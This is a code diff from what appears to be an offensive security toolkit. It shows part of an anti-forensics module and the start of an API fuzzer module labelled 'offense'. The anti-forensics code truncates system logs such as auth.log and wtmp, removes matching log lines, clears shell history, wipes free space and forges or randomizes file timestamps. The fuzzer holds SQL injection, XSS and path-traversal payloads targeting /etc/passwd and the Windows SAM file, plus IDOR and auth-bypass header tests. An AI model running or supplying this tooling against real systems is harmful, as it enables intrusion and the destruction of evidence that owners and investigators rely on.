f.write(secrets.token_bytes(chunk_size))
|
||||
written += chunk_size
|
||||
f.flush()
|
||||
except (OSError, IOError):
|
||||
pass # Disk full — expected
|
||||
|
||||
os.unlink(temp_file)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'mount_point': mount_point,
|
||||
'wiped_bytes': written,
|
||||
'wiped_mb': round(written / (1024*1024), 1)
|
||||
}
|
||||
|
||||
except Exception as e:
|
||||
# Clean up temp file
|
||||
if os.path.exists(temp_file):
|
||||
os.unlink(temp_file)
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
|
||||
# ── Timestamp Manipulation ───────────────────────────────────────────────────
|
||||
|
||||
class TimestampManip:
|
||||
"""File timestamp modification for counter-forensics."""
|
||||
|
||||
@staticmethod
|
||||
def get_timestamps(filepath: str) -> Dict:
|
||||
"""Get file timestamps."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
stat = os.stat(filepath)
|
||||
return {
|
||||
'ok': True,
|
||||
'file': filepath,
|
||||
'accessed': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(),
|
||||
'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
|
||||
'created': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(),
|
||||
'atime': stat.st_atime,
|
||||
'mtime': stat.st_mtime,
|
||||
'ctime': stat.st_ctime
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def set_timestamps(filepath: str, accessed: float = None,
|
||||
modified: float = None) -> Dict:
|
||||
"""Set file access and modification timestamps."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
try:
|
||||
stat = os.stat(filepath)
|
||||
atime = accessed if accessed is not None else stat.st_atime
|
||||
mtime = modified if modified is not None else stat.st_mtime
|
||||
os.utime(filepath, (atime, mtime))
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'file': filepath,
|
||||
'accessed': datetime.fromtimestamp(atime, timezone.utc).isoformat(),
|
||||
'modified': datetime.fromtimestamp(mtime, timezone.utc).isoformat()
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def clone_timestamps(source: str, target: str) -> Dict:
|
||||
"""Copy timestamps from one file to another."""
|
||||
if not os.path.exists(source):
|
||||
return {'ok': False, 'error': 'Source file not found'}
|
||||
if not os.path.exists(target):
|
||||
return {'ok': False, 'error': 'Target file not found'}
|
||||
|
||||
try:
|
||||
stat = os.stat(source)
|
||||
os.utime(target, (stat.st_atime, stat.st_mtime))
|
||||
return {
|
||||
'ok': True,
|
||||
'source': source,
|
||||
'target': target,
|
||||
'message': 'Timestamps cloned'
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def randomize_timestamps(filepath: str, start_epoch: float = None,
|
||||
end_epoch: float = None) -> Dict:
|
||||
"""Set random timestamps within a range."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
if start_epoch is None:
|
||||
start_epoch = time.time() - 365 * 24 * 3600 # 1 year ago
|
||||
if end_epoch is None:
|
||||
end_epoch = time.time()
|
||||
|
||||
import random
|
||||
atime = random.uniform(start_epoch, end_epoch)
|
||||
mtime = random.uniform(start_epoch, end_epoch)
|
||||
|
||||
return TimestampManip.set_timestamps(filepath, atime, mtime)
|
||||
|
||||
|
||||
# ── Log Clearing ─────────────────────────────────────────────────────────────
|
||||
|
||||
class LogCleaner:
|
||||
"""System log manipulation and clearing."""
|
||||
|
||||
COMMON_LOG_PATHS = [
|
||||
'/var/log/auth.log', '/var/log/syslog', '/var/log/messages',
|
||||
'/var/log/kern.log', '/var/log/daemon.log', '/var/log/secure',
|
||||
'/var/log/wtmp', '/var/log/btmp', '/var/log/lastlog',
|
||||
'/var/log/faillog', '/var/log/apache2/access.log',
|
||||
'/var/log/apache2/error.log', '/var/log/nginx/access.log',
|
||||
'/var/log/nginx/error.log', '/var/log/mysql/error.log',
|
||||
]
|
||||
|
||||
@staticmethod
|
||||
def list_logs() -> List[Dict]:
|
||||
"""List available log files."""
|
||||
logs = []
|
||||
for path in LogCleaner.COMMON_LOG_PATHS:
|
||||
if os.path.exists(path):
|
||||
try:
|
||||
stat = os.stat(path)
|
||||
logs.append({
|
||||
'path': path,
|
||||
'size': stat.st_size,
|
||||
'modified': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
|
||||
'writable': os.access(path, os.W_OK)
|
||||
})
|
||||
except OSError:
|
||||
pass
|
||||
return logs
|
||||
|
||||
@staticmethod
|
||||
def clear_log(filepath: str) -> Dict:
|
||||
"""Clear a log file (truncate to zero)."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
try:
|
||||
original_size = os.path.getsize(filepath)
|
||||
with open(filepath, 'w') as f:
|
||||
pass
|
||||
return {
|
||||
'ok': True,
|
||||
'file': filepath,
|
||||
'cleared_bytes': original_size
|
||||
}
|
||||
except PermissionError:
|
||||
return {'ok': False, 'error': 'Permission denied (need root?)'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def remove_entries(filepath: str, pattern: str) -> Dict:
|
||||
"""Remove specific entries matching a pattern from log file."""
|
||||
if not os.path.exists(filepath):
|
||||
return {'ok': False, 'error': 'File not found'}
|
||||
|
||||
try:
|
||||
with open(filepath, 'r', errors='ignore') as f:
|
||||
lines = f.readlines()
|
||||
|
||||
original_count = len(lines)
|
||||
filtered = [l for l in lines if not re.search(pattern, l, re.I)]
|
||||
removed = original_count - len(filtered)
|
||||
|
||||
with open(filepath, 'w') as f:
|
||||
f.writelines(filtered)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'file': filepath,
|
||||
'original_lines': original_count,
|
||||
'removed': removed,
|
||||
'remaining': len(filtered)
|
||||
}
|
||||
except PermissionError:
|
||||
return {'ok': False, 'error': 'Permission denied'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def clear_bash_history() -> Dict:
|
||||
"""Clear bash history."""
|
||||
results = []
|
||||
history_files = [
|
||||
os.path.expanduser('~/.bash_history'),
|
||||
os.path.expanduser('~/.zsh_history'),
|
||||
os.path.expanduser('~/.python_history'),
|
||||
]
|
||||
for hf in history_files:
|
||||
if os.path.exists(hf):
|
||||
try:
|
||||
size = os.path.getsize(hf)
|
||||
with open(hf, 'w') as f:
|
||||
pass
|
||||
results.append({'file': hf, 'cleared': size})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Also clear in-memory history
|
||||
try:
|
||||
subprocess.run(['history', '-c'], shell=True, capture_output=True)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return {'ok': True, 'cleared': results}
|
||||
|
||||
|
||||
# ── Metadata Scrubbing ───────────────────────────────────────────────────────
|
||||
|
||||
class MetadataScrubber:
|
||||
"""Remove identifying metadata from files."""
|
||||
|
||||
@staticmethod
|
||||
def scrub_image(filepath: str, output: str = None) -> Dict:
|
||||
"""Remove EXIF data from image."""
|
||||
if not HAS_PIL:
|
||||
return {'ok': False, 'error': 'Pillow not installed'}
|
||||
|
||||
try:
|
||||
img = PILImage.open(filepath)
|
||||
# Create clean copy without EXIF
|
||||
clean = PILImage.new(img.mode, img.size)
|
||||
clean.putdata(list(img.getdata()))
|
||||
|
||||
out_path = output or filepath
|
||||
clean.save(out_path)
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'file': out_path,
|
||||
'message': 'EXIF data removed'
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
@staticmethod
|
||||
def scrub_pdf_metadata(filepath: str) -> Dict:
|
||||
"""Remove metadata from PDF (basic — rewrites info dict)."""
|
||||
try:
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
# Remove common metadata keys
|
||||
for key in [b'/Author', b'/Creator', b'/Producer',
|
||||
b'/Title', b'/Subject', b'/Keywords']:
|
||||
# Simple regex replacement of metadata values
|
||||
pattern = key + rb'\s*\([^)]*\)'
|
||||
data = re.sub(pattern, key + b' ()', data)
|
||||
|
||||
with open(filepath, 'wb') as f:
|
||||
f.write(data)
|
||||
|
||||
return {'ok': True, 'file': filepath, 'message': 'PDF metadata scrubbed'}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
|
||||
# ── Anti-Forensics Manager ──────────────────────────────────────────────────
|
||||
|
||||
class AntiForensicsManager:
|
||||
"""Unified interface for anti-forensics operations."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'anti_forensics')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.delete = SecureDelete()
|
||||
self.timestamps = TimestampManip()
|
||||
self.logs = LogCleaner()
|
||||
self.scrubber = MetadataScrubber()
|
||||
self.audit_log: List[Dict] = []
|
||||
|
||||
def _log_action(self, action: str, target: str, details: str = ''):
|
||||
"""Internal audit log (ironic for anti-forensics)."""
|
||||
self.audit_log.append({
|
||||
'timestamp': datetime.now(timezone.utc).isoformat(),
|
||||
'action': action,
|
||||
'target': target,
|
||||
'details': details
|
||||
})
|
||||
|
||||
def get_capabilities(self) -> Dict:
|
||||
"""Check available capabilities."""
|
||||
return {
|
||||
'secure_delete': True,
|
||||
'timestamp_manip': True,
|
||||
'log_clearing': True,
|
||||
'metadata_scrub_image': HAS_PIL,
|
||||
'metadata_scrub_pdf': True,
|
||||
'free_space_wipe': True,
|
||||
}
|
||||
|
||||
|
||||
# ── Singleton ────────────────────────────────────────────────────────────────
|
||||
|
||||
_instance = None
|
||||
|
||||
def get_anti_forensics() -> AntiForensicsManager:
|
||||
global _instance
|
||||
if _instance is None:
|
||||
_instance = AntiForensicsManager()
|
||||
return _instance
|
||||
|
||||
|
||||
# ── CLI Interface ────────────────────────────────────────────────────────────
|
||||
|
||||
def run():
|
||||
"""CLI entry point for Anti-Forensics module."""
|
||||
mgr = get_anti_forensics()
|
||||
|
||||
while True:
|
||||
print(f"\n{'='*60}")
|
||||
print(f" Anti-Forensics Toolkit")
|
||||
print(f"{'='*60}")
|
||||
print()
|
||||
print(" 1 — Secure Delete File")
|
||||
print(" 2 — Secure Delete Directory")
|
||||
print(" 3 — Wipe Free Space")
|
||||
print(" 4 — View File Timestamps")
|
||||
print(" 5 — Set Timestamps")
|
||||
print(" 6 — Clone Timestamps")
|
||||
print(" 7 — Randomize Timestamps")
|
||||
print(" 8 — List System Logs")
|
||||
print(" 9 — Clear Log File")
|
||||
print(" 10 — Remove Log Entries (pattern)")
|
||||
print(" 11 — Clear Shell History")
|
||||
print(" 12 — Scrub Image Metadata")
|
||||
print(" 13 — Scrub PDF Metadata")
|
||||
print(" 0 — Back")
|
||||
print()
|
||||
|
||||
choice = input(" > ").strip()
|
||||
|
||||
if choice == '0':
|
||||
break
|
||||
elif choice == '1':
|
||||
path = input(" File path: ").strip()
|
||||
passes = input(" Overwrite passes (default 3): ").strip()
|
||||
if path:
|
||||
result = mgr.delete.secure_delete_file(path, int(passes) if passes.isdigit() else 3)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif choice == '2':
|
||||
path = input(" Directory path: ").strip()
|
||||
if path:
|
||||
confirm = input(f" DELETE ALL in {path}? (yes/no): ").strip()
|
||||
if confirm == 'yes':
|
||||
result = mgr.delete.secure_delete_directory(path)
|
||||
print(f" Deleted {result.get('files_deleted', 0)} files, {result.get('errors', 0)} errors")
|
||||
elif choice == '3':
|
||||
mount = input(" Mount point: ").strip()
|
||||
if mount:
|
||||
result = mgr.delete.wipe_free_space(mount)
|
||||
if result['ok']:
|
||||
print(f" Wiped {result['wiped_mb']} MB of free space")
|
||||
else:
|
||||
print(f" Error: {result['error']}")
|
||||
elif choice == '4':
|
||||
path = input(" File path: ").strip()
|
||||
if path:
|
||||
result = mgr.timestamps.get_timestamps(path)
|
||||
if result['ok']:
|
||||
print(f" Accessed: {result['accessed']}")
|
||||
print(f" Modified: {result['modified']}")
|
||||
print(f" Created: {result['created']}")
|
||||
elif choice == '5':
|
||||
path = input(" File path: ").strip()
|
||||
date_str = input(" Date (YYYY-MM-DD HH:MM:SS): ").strip()
|
||||
if path and date_str:
|
||||
try:
|
||||
ts = datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S').timestamp()
|
||||
result = mgr.timestamps.set_timestamps(path, ts, ts)
|
||||
print(f" Timestamps set to {date_str}")
|
||||
except ValueError:
|
||||
print(" Invalid date format")
|
||||
elif choice == '6':
|
||||
source = input(" Source file: ").strip()
|
||||
target = input(" Target file: ").strip()
|
||||
if source and target:
|
||||
result = mgr.timestamps.clone_timestamps(source, target)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif choice == '7':
|
||||
path = input(" File path: ").strip()
|
||||
if path:
|
||||
result = mgr.timestamps.randomize_timestamps(path)
|
||||
if result['ok']:
|
||||
print(f" Set to: {result.get('modified', '?')}")
|
||||
elif choice == '8':
|
||||
logs = mgr.logs.list_logs()
|
||||
for l in logs:
|
||||
writable = 'writable' if l['writable'] else 'read-only'
|
||||
print(f" {l['path']} ({l['size']} bytes) [{writable}]")
|
||||
elif choice == '9':
|
||||
path = input(" Log file path: ").strip()
|
||||
if path:
|
||||
result = mgr.logs.clear_log(path)
|
||||
if result['ok']:
|
||||
print(f" Cleared {result['cleared_bytes']} bytes")
|
||||
else:
|
||||
print(f" {result['error']}")
|
||||
elif choice == '10':
|
||||
path = input(" Log file path: ").strip()
|
||||
pattern = input(" Pattern to remove: ").strip()
|
||||
if path and pattern:
|
||||
result = mgr.logs.remove_entries(path, pattern)
|
||||
if result['ok']:
|
||||
print(f" Removed {result['removed']} of {result['original_lines']} lines")
|
||||
else:
|
||||
print(f" {result['error']}")
|
||||
elif choice == '11':
|
||||
result = mgr.logs.clear_bash_history()
|
||||
for c in result['cleared']:
|
||||
print(f" Cleared {c['file']} ({c['cleared']} bytes)")
|
||||
elif choice == '12':
|
||||
path = input(" Image path: ").strip()
|
||||
if path:
|
||||
result = mgr.scrubber.scrub_image(path)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
elif choice == '13':
|
||||
path = input(" PDF path: ").strip()
|
||||
if path:
|
||||
result = mgr.scrubber.scrub_pdf_metadata(path)
|
||||
print(f" {result.get('message', result.get('error'))}")
|
||||
742
modules/api_fuzzer.py
Normal file
742
modules/api_fuzzer.py
Normal file
@ -0,0 +1,742 @@
|
||||
"""AUTARCH API Fuzzer
|
||||
|
||||
Endpoint discovery, parameter fuzzing, auth testing, rate limit detection,
|
||||
GraphQL introspection, and response analysis for REST/GraphQL APIs.
|
||||
"""
|
||||
|
||||
DESCRIPTION = "API endpoint fuzzing & vulnerability testing"
|
||||
AUTHOR = "darkHal"
|
||||
VERSION = "1.0"
|
||||
CATEGORY = "offense"
|
||||
|
||||
import os
|
||||
import re
|
||||
import json
|
||||
import time
|
||||
import copy
|
||||
import threading
|
||||
from pathlib import Path
|
||||
from urllib.parse import urljoin, urlparse, parse_qs
|
||||
from typing import Dict, List, Optional, Any, Tuple
|
||||
|
||||
try:
|
||||
from core.paths import get_data_dir
|
||||
except ImportError:
|
||||
def get_data_dir():
|
||||
return str(Path(__file__).parent.parent / 'data')
|
||||
|
||||
try:
|
||||
import requests
|
||||
from requests.exceptions import RequestException
|
||||
HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
HAS_REQUESTS = False
|
||||
|
||||
|
||||
# ── Fuzz Payloads ────────────────────────────────────────────────────────────
|
||||
|
||||
SQLI_PAYLOADS = [
|
||||
"' OR '1'='1", "\" OR \"1\"=\"1", "'; DROP TABLE--", "1; SELECT 1--",
|
||||
"' UNION SELECT NULL--", "1' AND '1'='1", "admin'--", "' OR 1=1#",
|
||||
"1 AND 1=1", "1' ORDER BY 1--", "') OR ('1'='1",
|
||||
]
|
||||
|
||||
XSS_PAYLOADS = [
|
||||
"<script>alert(1)</script>", "'\"><img src=x onerror=alert(1)>",
|
||||
"javascript:alert(1)", "<svg/onload=alert(1)>", "{{7*7}}",
|
||||
"${7*7}", "<%=7*7%>", "{{constructor.constructor('return 1')()}}",
|
||||
]
|
||||
|
||||
TYPE_CONFUSION = [
|
||||
None, True, False, 0, -1, 2147483647, -2147483648,
|
||||
99999999999999, 0.1, -0.1, float('inf'),
|
||||
"", " ", "null", "undefined", "NaN", "true", "false",
|
||||
[], {}, [None], {"__proto__": {}},
|
||||
"A" * 1000, "A" * 10000,
|
||||
]
|
||||
|
||||
TRAVERSAL_PAYLOADS = [
|
||||
"../../../etc/passwd", "..\\..\\..\\windows\\system32\\config\\sam",
|
||||
"....//....//....//etc/passwd", "%2e%2e%2f%2e%2e%2f",
|
||||
"/etc/passwd%00", "..%252f..%252f",
|
||||
]
|
||||
|
||||
COMMON_ENDPOINTS = [
|
||||
'/api', '/api/v1', '/api/v2', '/api/v3',
|
||||
'/api/users', '/api/admin', '/api/login', '/api/auth',
|
||||
'/api/config', '/api/settings', '/api/debug', '/api/health',
|
||||
'/api/status', '/api/info', '/api/version', '/api/docs',
|
||||
'/api/swagger', '/api/graphql', '/api/internal',
|
||||
'/swagger.json', '/swagger-ui', '/openapi.json',
|
||||
'/api/tokens', '/api/keys', '/api/secrets',
|
||||
'/api/upload', '/api/download', '/api/export', '/api/import',
|
||||
'/api/search', '/api/query', '/api/execute', '/api/run',
|
||||
'/graphql', '/graphiql', '/playground',
|
||||
'/.well-known/openid-configuration',
|
||||
'/api/password/reset', '/api/register', '/api/verify',
|
||||
'/api/webhook', '/api/callback', '/api/notify',
|
||||
'/actuator', '/actuator/health', '/actuator/env',
|
||||
'/metrics', '/prometheus', '/_debug', '/__debug__',
|
||||
]
|
||||
|
||||
|
||||
# ── API Fuzzer Engine ────────────────────────────────────────────────────────
|
||||
|
||||
class APIFuzzer:
|
||||
"""REST & GraphQL API security testing."""
|
||||
|
||||
def __init__(self):
|
||||
self.data_dir = os.path.join(get_data_dir(), 'api_fuzzer')
|
||||
os.makedirs(self.data_dir, exist_ok=True)
|
||||
self.session = requests.Session() if HAS_REQUESTS else None
|
||||
self.results: List[Dict] = []
|
||||
self._jobs: Dict[str, Dict] = {}
|
||||
|
||||
def set_auth(self, auth_type: str, value: str, header_name: str = 'Authorization'):
|
||||
"""Configure authentication for requests."""
|
||||
if not self.session:
|
||||
return
|
||||
if auth_type == 'bearer':
|
||||
self.session.headers[header_name] = f'Bearer {value}'
|
||||
elif auth_type == 'api_key':
|
||||
self.session.headers[header_name] = value
|
||||
elif auth_type == 'basic':
|
||||
parts = value.split(':', 1)
|
||||
if len(parts) == 2:
|
||||
self.session.auth = (parts[0], parts[1])
|
||||
elif auth_type == 'cookie':
|
||||
self.session.cookies.set('session', value)
|
||||
elif auth_type == 'custom':
|
||||
self.session.headers[header_name] = value
|
||||
|
||||
def clear_auth(self):
|
||||
"""Clear authentication."""
|
||||
if self.session:
|
||||
self.session.headers.pop('Authorization', None)
|
||||
self.session.auth = None
|
||||
self.session.cookies.clear()
|
||||
|
||||
# ── Endpoint Discovery ───────────────────────────────────────────────
|
||||
|
||||
def discover_endpoints(self, base_url: str, custom_paths: List[str] = None,
|
||||
threads: int = 10) -> str:
|
||||
"""Discover API endpoints. Returns job_id."""
|
||||
job_id = f'discover_{int(time.time())}'
|
||||
self._jobs[job_id] = {
|
||||
'type': 'discover', 'status': 'running',
|
||||
'found': [], 'checked': 0, 'total': 0
|
||||
}
|
||||
|
||||
def _discover():
|
||||
paths = COMMON_ENDPOINTS + (custom_paths or [])
|
||||
self._jobs[job_id]['total'] = len(paths)
|
||||
found = []
|
||||
|
||||
def check_path(path):
|
||||
try:
|
||||
url = urljoin(base_url.rstrip('/') + '/', path.lstrip('/'))
|
||||
resp = self.session.get(url, timeout=5, allow_redirects=False)
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
if resp.status_code < 404:
|
||||
entry = {
|
||||
'path': path,
|
||||
'url': url,
|
||||
'status': resp.status_code,
|
||||
'content_type': resp.headers.get('content-type', ''),
|
||||
'size': len(resp.content),
|
||||
'methods': []
|
||||
}
|
||||
|
||||
# Check allowed methods via OPTIONS
|
||||
try:
|
||||
opts = self.session.options(url, timeout=3)
|
||||
allow = opts.headers.get('Allow', '')
|
||||
if allow:
|
||||
entry['methods'] = [m.strip() for m in allow.split(',')]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
found.append(entry)
|
||||
except Exception:
|
||||
self._jobs[job_id]['checked'] += 1
|
||||
|
||||
# Thread pool
|
||||
active_threads = []
|
||||
for path in paths:
|
||||
t = threading.Thread(target=check_path, args=(path,))
|
||||
t.start()
|
||||
active_threads.append(t)
|
||||
if len(active_threads) >= threads:
|
||||
for at in active_threads:
|
||||
at.join(timeout=10)
|
||||
active_threads.clear()
|
||||
|
||||
for t in active_threads:
|
||||
t.join(timeout=10)
|
||||
|
||||
self._jobs[job_id]['found'] = found
|
||||
self._jobs[job_id]['status'] = 'complete'
|
||||
|
||||
threading.Thread(target=_discover, daemon=True).start()
|
||||
return job_id
|
||||
|
||||
def parse_openapi(self, url_or_path: str) -> Dict:
|
||||
"""Parse OpenAPI/Swagger spec to extract endpoints."""
|
||||
try:
|
||||
if url_or_path.startswith('http'):
|
||||
resp = self.session.get(url_or_path, timeout=10)
|
||||
spec = resp.json()
|
||||
else:
|
||||
with open(url_or_path) as f:
|
||||
spec = json.load(f)
|
||||
|
||||
endpoints = []
|
||||
paths = spec.get('paths', {})
|
||||
for path, methods in paths.items():
|
||||
for method, details in methods.items():
|
||||
if method.upper() in ('GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS'):
|
||||
params = []
|
||||
for p in details.get('parameters', []):
|
||||
params.append({
|
||||
'name': p.get('name'),
|
||||
'in': p.get('in'),
|
||||
'required': p.get('required', False),
|
||||
'type': p.get('schema', {}).get('type', 'string')
|
||||
})
|
||||
endpoints.append({
|
||||
'path': path,
|
||||
'method': method.upper(),
|
||||
'summary': details.get('summary', ''),
|
||||
'parameters': params,
|
||||
'tags': details.get('tags', [])
|
||||
})
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'title': spec.get('info', {}).get('title', ''),
|
||||
'version': spec.get('info', {}).get('version', ''),
|
||||
'endpoints': endpoints,
|
||||
'count': len(endpoints)
|
||||
}
|
||||
except Exception as e:
|
||||
return {'ok': False, 'error': str(e)}
|
||||
|
||||
# ── Parameter Fuzzing ────────────────────────────────────────────────
|
||||
|
||||
def fuzz_params(self, url: str, method: str = 'GET',
|
||||
params: Dict = None, payload_type: str = 'type_confusion') -> Dict:
|
||||
"""Fuzz API parameters with various payloads."""
|
||||
if not self.session:
|
||||
return {'ok': False, 'error': 'requests not available'}
|
||||
|
||||
if payload_type == 'sqli':
|
||||
payloads = SQLI_PAYLOADS
|
||||
elif payload_type == 'xss':
|
||||
payloads = XSS_PAYLOADS
|
||||
elif payload_type == 'traversal':
|
||||
payloads = TRAVERSAL_PAYLOADS
|
||||
else:
|
||||
payloads = TYPE_CONFUSION
|
||||
|
||||
params = params or {}
|
||||
findings = []
|
||||
|
||||
for param_name, original_value in params.items():
|
||||
for payload in payloads:
|
||||
fuzzed = copy.deepcopy(params)
|
||||
fuzzed[param_name] = payload
|
||||
|
||||
try:
|
||||
if method.upper() == 'GET':
|
||||
resp = self.session.get(url, params=fuzzed, timeout=10)
|
||||
else:
|
||||
resp = self.session.request(method.upper(), url, json=fuzzed, timeout=10)
|
||||
|
||||
# Analyze response for anomalies
|
||||
finding = self._analyze_fuzz_response(
|
||||
resp, param_name, payload, payload_type
|
||||
)
|
||||
if finding:
|
||||
findings.append(finding)
|
||||
|
||||
except RequestException as e:
|
||||
if 'timeout' not in str(e).lower():
|
||||
findings.append({
|
||||
'param': param_name,
|
||||
'payload': str(payload),
|
||||
'type': 'error',
|
||||
'detail': str(e)
|
||||
})
|
||||
|
||||
return {'ok': True, 'findings': findings, 'tested': len(params) * len(payloads)}
|
||||
|
||||
def _analyze_fuzz_response(self, resp, param: str, payload, payload_type: str) -> Optional[Dict]:
|
||||
"""Analyze response for vulnerability indicators."""
|
||||
body = resp.text.lower()
|
||||
finding = None
|
||||
|
||||
# SQL error detection
|
||||
sql_errors = [
|
||||
'sql syntax', 'mysql_fetch', 'pg_query', 'sqlite3',
|
||||
'unclosed quotation', 'unterminated string', 'syntax error',
|
||||
'odbc', 'oracle error', 'microsoft ole db', 'ora-0'
|
||||
]
|
||||
if payload_type == 'sqli' and any(e in body for e in sql_errors):
|
||||
finding = {
|
||||
'param': param, 'payload': str(payload),
|
||||
'type': 'sqli', 'severity': 'high',
|
||||
'detail': 'SQL error in response',
|
||||
'status': resp.status_code
|
||||
}
|
||||
|
||||
# XSS reflection
|
||||
if payload_type == 'xss' and str(payload).lower() in body:
|
||||
finding = {
|
||||
'param': param, 'payload': str(payload),
|
||||
'type': 'xss_reflected', 'severity': 'high',
|
||||
'detail': 'Payload reflected in response',
|
||||
'status': resp.status_code
|
||||
}
|
||||
|
||||
# Path traversal
|
||||
if payload_type == 'traversal':
|
||||
traversal_indicators = ['root:', '/bin/', 'windows\\system32', '[boot loader]']
|
||||
if any(t in body for t in traversal_indicators):
|
||||
finding = {
|
||||
'param': param, 'payload': str(payload),
|
||||
'type': 'path_traversal', 'severity': 'critical',
|
||||
'detail': 'File content in response',
|
||||
'status': resp.status_code
|
||||
}
|
||||
|
||||
# Server error (500) might indicate injection
|
||||
if resp.status_code == 500 and not finding:
|
||||
finding = {
|
||||
'param': param, 'payload': str(payload),
|
||||
'type': 'server_error', 'severity': 'medium',
|
||||
'detail': f'Server error (500) triggered',
|
||||
'status': resp.status_code
|
||||
}
|
||||
|
||||
# Stack trace / debug info disclosure
|
||||
debug_indicators = [
|
||||
'traceback', 'stacktrace', 'exception', 'debug',
|
||||
'at line', 'file "/', 'internal server error'
|
||||
]
|
||||
if any(d in body for d in debug_indicators) and not finding:
|
||||
finding = {
|
||||
'param': param, 'payload': str(payload),
|
||||
'type': 'info_disclosure', 'severity': 'medium',
|
||||
'detail': 'Debug/stack trace in response',
|
||||
'status': resp.status_code
|
||||
}
|
||||
|
||||
return finding
|
||||
|
||||
# ── Auth Testing ─────────────────────────────────────────────────────
|
||||
|
||||
def test_idor(self, url_template: str, id_range: Tuple[int, int],
|
||||
auth_token: str = None) -> Dict:
|
||||
"""Test for IDOR by iterating IDs."""
|
||||
findings = []
|
||||
start_id, end_id = id_range
|
||||
|
||||
if auth_token:
|
||||
self.session.headers['Authorization'] = f'Bearer {auth_token}'
|
||||
|
||||
for i in range(start_id, end_id + 1):
|
||||
url = url_template.replace('{id}', str(i))
|
||||
try:
|
||||
resp = self.session.get(url, timeout=5)
|
||||
if resp.status_code == 200:
|
||||
findings.append({
|
||||
'id': i, 'url': url,
|
||||
'status': resp.status_code,
|
||||
'size': len(resp.content),
|
||||
'accessible': True
|
||||
})
|
||||
elif resp.status_code not in (401, 403, 404):
|
||||
findings.append({
|
||||
'id': i, 'url': url,
|
||||
'status': resp.status_code,
|
||||
'accessible': False,
|
||||
'note': f'Unexpected status: {resp.status_code}'
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return {
|
||||
'ok': True, 'findings': findings,
|
||||
'accessible_count': sum(1 for f in findings if f.get('accessible')),
|
||||
'tested': end_id - start_id + 1
|
||||
}
|
||||
|
||||
def test_auth_bypass(self, url: str) -> Dict:
|
||||
"""Test common auth bypass techniques."""
|
||||
bypasses = []
|
||||
|
||||
tests = [
|
||||
('No auth header', {}),
|
||||
('Empty Bearer', {'Authorization': 'Bearer '}),
|
||||
('Bearer null', {'Authorization': 'Bearer null'}),
|
||||
('Bearer undefined', {'Authorization': 'Bearer undefined'}),
|
||||
('Admin header', {'X-Admin': 'true'}),
|
||||
('Internal header', {'X-Forwarded-For': '127.0.0.1'}),
|
||||
('Override method', {'X-HTTP-Method-Override': 'GET'}),
|
||||
('Original URL', {'X-Original-URL': '/admin'}),
|
||||
]
|
||||
|
||||
for name, headers in tests:
|
||||
try:
|
||||
resp = requests.get(url, headers=headers, timeout=5)
|
||||
if resp.status_code == 200:
|
||||
bypasses.append({
|
||||
'technique': name,
|
||||
'status': resp.status_code,
|
||||
'size': len(resp.content),
|
||||
'success': True
|
||||
})
|
||||
else:
|
||||
bypasses.append({
|
||||
'technique': name,
|
||||
'status': resp.status_code,
|
||||
'success': False
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return {
|
||||
'ok': True,
|
||||
'bypasses': bypasses,
|
||||
'successful': sum(1 for b in bypasses if b.get('success'))
|
||||
}
|
||||
|
||||
# ── Rate Limiting ────────────────────────────────────────────────────
|
||||
|
||||
def test_rate_limit(self, url: str, requests_count: int = 50,
|
||||
method: str = 'GET') -> Dict:
|
||||
"""Test API rate limiting."""
|
||||
results = []
|
||||
start_time = time.time()
|
||||
|
||||
for i in range(requests_count):
|
||||
try:
|
||||
resp = self.session.request(method, url, timeout=10)
|
||||
results.append({
|
||||
'request_num': i + 1,
|
||||
'status': resp.status_code,
|
||||
'time': time.time() - start_time,
|
||||
'rate_limit_remaining': resp.headers.get('X-RateLimit-Remaining', ''),
|
||||
'retry_after': resp.headers.get('Retry-After', '')
|
||||
})
|
||||
if resp.status_code == 429:
|
||||
break
|
||||
except Exception as e:
|
||||
results.append({
|
||||
'request_num': i + 1,
|
||||
'error': str(e),
|
||||
'time': time.time() - start_time
|
||||
})
|
||||
|
||||
